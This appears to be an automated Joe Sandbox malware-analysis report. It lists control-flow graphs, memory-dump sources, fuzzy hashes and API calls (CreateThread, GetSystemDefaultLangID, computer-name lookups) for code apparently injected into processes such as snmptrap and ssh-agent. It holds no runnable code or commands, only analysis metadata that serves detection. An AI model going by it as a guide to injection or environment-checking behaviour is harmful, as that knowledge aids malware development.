                                                                                                                                                                      control_flow_graph 187 6c5910-6c5968 189 6c596a 187->189 190 6c5915-6c5928 call 6f9970 187->190 189->190 193 6c5931-6d072c 189->193 196 6c59b8 call 6e0df0 190->196 198 6d0806-6d0809 193->198 199 6d0732-6d0738 193->199 200 6c59bd-6c59c2 call 6c5d90 196->200 207 6d079d-6d07a6 198->207 202 6d073e 199->202 203 6d0800 199->203 212 6c59c7-6c59ce 200->212 202->203 204 6d0744-6d0774 202->204 203->198 206 6d06b3-6d06b7 203->206 213 6d077a-6d081c 204->213 214 6d06d5-6d06d9 204->214 206->207 209 6d06bd 206->209 210 6d07a8 207->210 211 6d0791-6d0793 207->211 209->207 215 6d06c3-6d07fe 209->215 210->211 217 6d07aa 210->217 216 6d07ca-6d07cc 211->216 218 6c5a1a-6c5a26 call 6c5e10 212->218 219 6c59d0 212->219 213->207 222 6d06df 214->222 223 6d06db 214->223 215->203 217->216 218->196 232 6c5a08-6c5a0b 218->232 219->218 225 6c59d2-6c59d8 219->225 222->207 223->222 227 6d06dd 223->227 239 6c59d9-6c59de call 6f2190 225->239 227->222 230 6dc0cc 227->230 233 6dc0ce-6dc0d0 230->233 234 6dc0e8-6dc102 230->234 237 6c5a0d 232->237 238 6c5994-6c599c 232->238 236 6dc0d2-6dc0df 233->236 235 6dc104 234->235 234->236 235->236 247 6dc0e7 235->247 236->247 250 6c5991 237->250 251 6c5932 237->251 244 6c599e-6c59f7 238->244 245 6c5a02 238->245 239->238 255 6c59e0 239->255 244->245 253 6c597d 245->253 254 6c59d4-6c5a15 call 6e11a0 245->254 250->251 256 6c5993 250->256 252 6c59e4-6c59ec call 6f21ac 251->252 264 6c59ed 252->264 265 6c5a62-6c5a6e 252->265 253->254 258 6c597f-6c5981 253->258 255->238 259 6c59e2 255->259 256->238 263 6c5983-6c5a38 258->263 259->252 263->238 270 6c5a3e 263->270 264->263 268 6c59ee-6c59ef 264->268 271 6c5a75-6c5ab3 call 6e1280 265->271 272 6c5a70 265->272 268->263 273 6c59f1 268->273 270->239 280 6c5abb-6c5ac9 271->280 281 6c5ab5 271->281 272->271 274 6c5a72 272->274 273->190 274->271 283 6c5af2-6c5af5 
280->283 281->280 282 6c5ab7-6c5ab9 281->282 282->280 287 6c5adb-6c5adc 283->287 288 6c5ad5 283->288 290 6c5a45-6c5a46 287->290 291 6c5ae2 287->291 288->287 289 6c5ad7-6c5ad9 288->289 289->287 291->290 292 6c5ae8 291->292 292->283
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 86c1450bf9c094e939ee8eec5e23809b64b88c736191d204eb99341fd68d81ef
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 01F10431B1DF888FC6A9971E58417BA73D3EB99310F58429EE04BC7396DD34AC468386

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 337 6c5b42-6c5b47 call 6c5d90 339 6c5b4c-6c5b52 337->339 341 6c5b0d 339->341 342 6c5c42-6c5c62 call 6e1280 339->342 341->342 343 6c5b13 341->343 359 6c5c14-6c5cc0 342->359 360 6c5c26 342->360 345 6c5c8f-6c5c96 343->345 347 6c5c98-6c5c9a 345->347 348 6c5c29 345->348 349 6c5c9c 347->349 350 6c5c2f-6c5c36 348->350 351 6c5cc2-6c5cc9 call 6c52a0 348->351 357 6c5d0e-6c5d18 349->357 358 6c5bfa 349->358 350->351 355 6c5c3c 350->355 367 6c5c69 351->367 368 6c5ccb 351->368 355->337 363 6c5d1a 357->363 364 6c5d54 357->364 358->357 362 6c5c00 358->362 359->351 360->359 366 6c5c28 360->366 362->359 371 6c5d4b-6c5d52 363->371 366->348 369 6c5c6f 367->369 370 6c5b68-6c5d75 367->370 368->349 372 6c5ccd 368->372 369->370 373 6c5c75 369->373 371->364 374 6c5d45-6c5d47 371->374 372->349 375 6c5ccf-6c5ce4 CreateThread 372->375 373->345 377 6c5d5f 374->377 378 6c5d49 374->378 380 6c5cea 375->380 381 6c5c01-6c5c05 375->381 384 6c5d65 377->384 378->371 378->377 380->381 382 6c5cf0-6c5cf6 380->382 385 6c5c20-6c5c68 381->385 388 6c5d37-6c5d41 381->388 382->385 384->384 388->371 389 6c5d43 388->389 389->364
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 3d2cebb7c0d168c541da3dd5d091b452438fd1b916f7c159ca3e226af60e1c14
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: A621713020CF458FDB6997188C58FB56AE3EB55310F5801AE9047CE3A2DA64FDC5935A

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 390 6c5b09-6c5d01 395 6c5bb4-6c5ce4 CreateThread 390->395 396 6c5d07 390->396 401 6c5cea 395->401 402 6c5c01-6c5c05 395->402 396->395 397 6c5d0d 396->397 400 6c5d37-6c5d41 397->400 403 6c5d4b-6c5d52 400->403 404 6c5d43 400->404 401->402 405 6c5cf0-6c5cf6 401->405 402->400 409 6c5c20-6c5c68 402->409 406 6c5d54 403->406 407 6c5d45-6c5d47 403->407 404->406 405->409 410 6c5d5f 407->410 411 6c5d49 407->411 414 6c5d65 410->414 411->403 411->410 414->414
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 0b0b9479335af27caca946bf01d7751888e59105f6a3e5b1b8ba86de97b7179c
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: E201C07010DF868FDB5557248C68FB97BA3EF50324F6401AFC487CA191DA607DC2A716

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 415 6c5b87-6c5b99 CreateThread 416 6c5b1c-6c5b3b 415->416 417 6c5cff-6c5d01 415->417 416->417 418 6c5bb4-6c5ce4 CreateThread 417->418 419 6c5d07 417->419 425 6c5cea 418->425 426 6c5c01-6c5c05 418->426 419->418 420 6c5d0d 419->420 424 6c5d37-6c5d41 420->424 427 6c5d4b-6c5d52 424->427 428 6c5d43 424->428 425->426 429 6c5cf0-6c5cf6 425->429 426->424 433 6c5c20-6c5c68 426->433 430 6c5d54 427->430 431 6c5d45-6c5d47 427->431 428->430 429->433 434 6c5d5f 431->434 435 6c5d49 431->435 438 6c5d65 434->438 435->427 435->434 438->438
APIs
Memory Dump Source
• Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction ID: f714f0bff0071792a068c944bc3adf3a019ac97169718de72cb29d8ad58a7a48
• Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction Fuzzy Hash: 94E0863061DB444FDB599B245C607397EE6EB88310F1502CEC44BDB2D1CB696D464792

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction ID: b3a962a8b7e862f9cac5a3f9d7eb11fc595139cb5479a988dc9cc437559771f0
• Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction Fuzzy Hash: 3D01F26090DFC0CFD75A97594C41BF92553FB54320F2801DE904FCB292C834B9C29746

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: 8aa031aa052b0f8354f5fef07018c515b64e9bb26d369a13bcc651876de42c0c
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: 2AC08C601388039E57380A480C0BFF026C2C212350B0E080F8C06C3B20DD08CE030097

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000019.00000002.1539918997.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_25_2_6c0000_SensorDataService.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: da1ae90f64f2d25c0e5ac9297a1310dd3bcbd9228667d4bd2c02df44878d6c7c
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: 9BC092A05A850B8F56382A882C0AEF135D6C623760F0E581FED0A8BB60DD5C8D4341A3

Execution Graph

Execution Coverage: 4.2%
Dynamic/Decrypted Code Coverage: 97.5%
Signature Coverage: 0%
Total number of Nodes: 79
Total number of Limit Nodes: 5

Control-flow Graph

APIs
• GetSystemDefaultLangID.KERNELBASE ref: 006853C4
Memory Dump Source
• Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: 320e0fdfc968efa23e5be2b3f6b80565402518b64dff1efe15403fcea4b02cd8
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: 8D41E95140DE958FD726732444643F07BD39B123E2F9D07D7D4878B2E2F6984C829766

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
• Instruction ID: 38bb56dd8485a74b2a25a2004df6af95478c3628df74100b2d2887c7261a8c9e
• Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
• Instruction Fuzzy Hash: 34D12531418F098BEB28FF58C8457EAB3D2FBA6310F18461ED846C3265DA749E458FC2

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
Memory Dump Source
• Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd

Control-flow Graph

Control-flow Graph

Control-flow Graph

Control-flow Graph
APIs
Similarity
• API ID: CreateThread
• API String ID: 2422867632-0

Control-flow Graph
APIs
Similarity
• API ID: wcscpy
• API String ID: 1284135714-0

Control-flow Graph
APIs
Similarity
• API ID: CloseHandle
• API String ID: 2962429428-0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
APIs
Memory Dump Source
• Source File: 0000001A.00000002.2621234035.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_680000_snmptrap.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: 23297f8138182d695c908156df56553f15caa64d223fc8a144344585e912866a
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: FCC092A859850B8F51783A882C0E0F639924B23760F8C5B13EC868B368DD584D4343A2

Control-flow Graph

APIs
• GetSystemDefaultLangID.KERNELBASE ref: 005253C4
Memory Dump Source
• Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: fff7476c3727668997f0e9f14ca2ab18c86821a0c6a8338a31622065cb3f611d
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: 8441D75641DEB58FDB2A9A2474643707F90BF333E2F9D1CD6D482860E2F1B84C419366

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
• Instruction ID: 214ace1ddad264c1954cf69d19e3ef3e3a612aa453908a0fb0cd634a24e03c58
• Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
• Instruction Fuzzy Hash: 1AD1283141CB098BCB24EF58DC497EA7BE1FB90314F685A1FD946C31A4DA74D645CAC2

Control-flow Graph

Memory Dump Source
• Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
• Instruction ID: b6ca5f02ec97878bb52d4a87904fa320af6e47dcd37845dae38d154dbc967e81
• Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
• Instruction Fuzzy Hash: C7610D3450FA75CFD7698BE8B8182367EA0FFA7350F680A5AE406C21E0DF249C59C752

Control-flow Graph

Memory Dump Source
• Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction ID: 9fef74b2d6fa605f30df5ddcdd88bd5c5045b4edef9dbe4ba62fe8769f5600f5
• Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction Fuzzy Hash: 56F1463071CF594FC669972C685A2BA7FD2FBCA314F58459AE04AC32D6DD249C46C382

Control-flow Graph

Memory Dump Source
• Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction ID: d49ff784e9a27906dac7de33df3fd33538e6e3826bd86f4445e3696d44613eab
• Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction Fuzzy Hash: A221D33020CF658FCB6A9718B4887742ED1BF57321F6809A69047DF1D6FA34CD489711

Control-flow Graph

Memory Dump Source
• Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction ID: 0c23bd7930113c9058c7f677152db281cdb8a3d62256f3f5166fd4a16a9553f9
• Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction Fuzzy Hash: A801803010DF668FDB565624BC193796F90BF53324F6509AB8487DA0D5FA744E04AB12

Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0

Control-flow Graph (figure; legend: Executed / Not Executed)

APIs
Memory Dump Source
• Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0

Control-flow Graph (figure; legend: Executed / Not Executed)

APIs
Memory Dump Source
• Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0

Control-flow Graph (figure; legend: Executed / Not Executed)

APIs
Memory Dump Source
• Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0

Control-flow Graph (figure; legend: Executed / Not Executed)

APIs
• GetSystemDefaultLangID.KERNELBASE ref: 004E53C4
Memory Dump Source
• Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0

Control-flow Graph (figure; legend: Executed / Not Executed)

APIs
Memory Dump Source
• Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0

Control-flow Graph (figure; legend: Executed / Not Executed)

Memory Dump Source
• Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                      • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction ID: 14ed87657ee62c2b29eba7dbf53c154d78ff35c268286476c9dc755dd2d50452
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: C3610E3050CAC99FCF658B2B8814237BAA0BB55353F19469FE54EC22A1DF2C4C46934F

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 187 4e5910-4e5968 189 4e596a 187->189 190 4e5915-4e5928 call 519970 187->190 189->190 193 4e5931-4f072c 189->193 196 4e59b8 call 500df0 190->196 198 4f0806-4f0809 193->198 199 4f0732-4f0738 193->199 201 4e59bd-4e59c2 call 4e5d90 196->201 206 4f079d-4f07a6 198->206 202 4f073e 199->202 203 4f0800 199->203 208 4e59c7-4e59ce 201->208 202->203 204 4f0744-4f0774 202->204 203->198 205 4f06b3-4f06b7 203->205 215 4f077a-4f081c 204->215 216 4f06d5-4f06d9 204->216 205->206 210 4f06bd 205->210 211 4f07a8 206->211 212 4f0791-4f0793 206->212 213 4e5a1a-4e5a26 call 4e5e10 208->213 214 4e59d0 208->214 210->206 217 4f06c3-4f07fe 210->217 211->212 219 4f07aa 211->219 218 4f07ca-4f07cc 212->218 213->196 232 4e5a08-4e5a0b 213->232 214->213 220 4e59d2-4e59d8 214->220 215->206 223 4f06df 216->223 224 4f06db 216->224 217->203 219->218 239 4e59d9-4e59de call 512190 220->239 223->206 224->223 227 4f06dd 224->227 227->223 231 4fc0cc 227->231 233 4fc0ce-4fc0d0 231->233 234 4fc0e8-4fc102 231->234 237 4e5a0d 232->237 238 4e5994-4e599c 232->238 236 4fc0d2-4fc0df 233->236 235 4fc104 234->235 234->236 235->236 247 4fc0e7 235->247 236->247 250 4e5932 237->250 251 4e5991 237->251 244 4e599e-4e59f7 238->244 245 4e5a02 238->245 239->238 255 4e59e0 239->255 244->245 253 4e597d 245->253 254 4e59d4-4e5a15 call 5011a0 245->254 252 4e59e4-4e59ec call 5121ac 250->252 251->250 256 4e5993 251->256 264 4e59ed 252->264 265 4e5a62-4e5a6e 252->265 253->254 258 4e597f-4e5981 253->258 255->238 259 4e59e2 255->259 256->238 263 4e5983-4e5a38 258->263 259->252 263->238 270 4e5a3e 263->270 264->263 268 4e59ee-4e59ef 264->268 271 4e5a75-4e5ab3 call 501280 265->271 272 4e5a70 265->272 268->263 274 4e59f1 268->274 270->239 280 4e5abb-4e5ac9 271->280 281 4e5ab5 271->281 272->271 276 4e5a72 272->276 274->190 276->271 283 4e5af2-4e5af5 
280->283 281->280 282 4e5ab7-4e5ab9 281->282 282->280 286 4e5adb-4e5adc 283->286 287 4e5ad5 283->287 289 4e5a45-4e5a46 286->289 290 4e5ae2 286->290 287->286 288 4e5ad7-4e5ad9 287->288 288->286 290->289 291 4e5ae8 290->291 291->283
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 176d20ce2dfa6e1206a5e3775f786f51c02e6cda3db66efae998b82ea4a1d3d2
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: ECF1172071CE898FC669A71D58452BE7BD2FBD9314F58469BE04AC33D7DD289C06838B

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 336 4e5b42-4e5b47 call 4e5d90 338 4e5b4c-4e5b52 336->338 340 4e5b0d 338->340 341 4e5c42-4e5c62 call 501280 338->341 340->341 342 4e5b13 340->342 358 4e5c26 341->358 359 4e5c14-4e5cc0 341->359 344 4e5c8f-4e5c96 342->344 346 4e5c98-4e5c9a 344->346 347 4e5c29 344->347 349 4e5c9c 346->349 350 4e5c2f-4e5c36 347->350 351 4e5cc2-4e5cc9 call 4e52a0 347->351 356 4e5d0e-4e5d18 349->356 357 4e5bfa 349->357 350->351 354 4e5c3c 350->354 366 4e5ccb 351->366 367 4e5c69 351->367 354->336 362 4e5d1a 356->362 363 4e5d54 356->363 357->356 361 4e5c00 357->361 358->359 365 4e5c28 358->365 359->351 361->359 370 4e5d4b-4e5d52 362->370 365->347 366->349 371 4e5ccd 366->371 368 4e5c6f 367->368 369 4e5b68-4e5d75 367->369 368->369 373 4e5c75 368->373 370->363 374 4e5d45-4e5d47 370->374 371->349 375 4e5ccf-4e5ce4 CreateThread 371->375 373->344 377 4e5d5f 374->377 378 4e5d49 374->378 379 4e5cea 375->379 380 4e5c01-4e5c05 375->380 381 4e5d65 377->381 378->370 378->377 379->380 382 4e5cf0-4e5cf6 379->382 384 4e5c20-4e5c68 380->384 387 4e5d37-4e5d41 380->387 381->381 382->384 387->370 388 4e5d43 387->388 388->363
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 5ca432cb1d534dc9a6b16f374130bc8802a46fd2c204f9bc8ce13c1a25c82c2e
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: BE21AD3020CFC58FCB699B1B88A877626A1AB5531FF3845A79047CF392CA6C9C45931F

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 389 4e5b09-4e5d01 394 4e5d07 389->394 395 4e5bb4-4e5ce4 CreateThread 389->395 394->395 396 4e5d0d 394->396 400 4e5cea 395->400 401 4e5c01-4e5c05 395->401 399 4e5d37-4e5d41 396->399 402 4e5d4b-4e5d52 399->402 403 4e5d43 399->403 400->401 404 4e5cf0-4e5cf6 400->404 401->399 408 4e5c20-4e5c68 401->408 405 4e5d54 402->405 406 4e5d45-4e5d47 402->406 403->405 404->408 409 4e5d5f 406->409 410 4e5d49 406->410 413 4e5d65 409->413 410->402 410->409 413->413
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
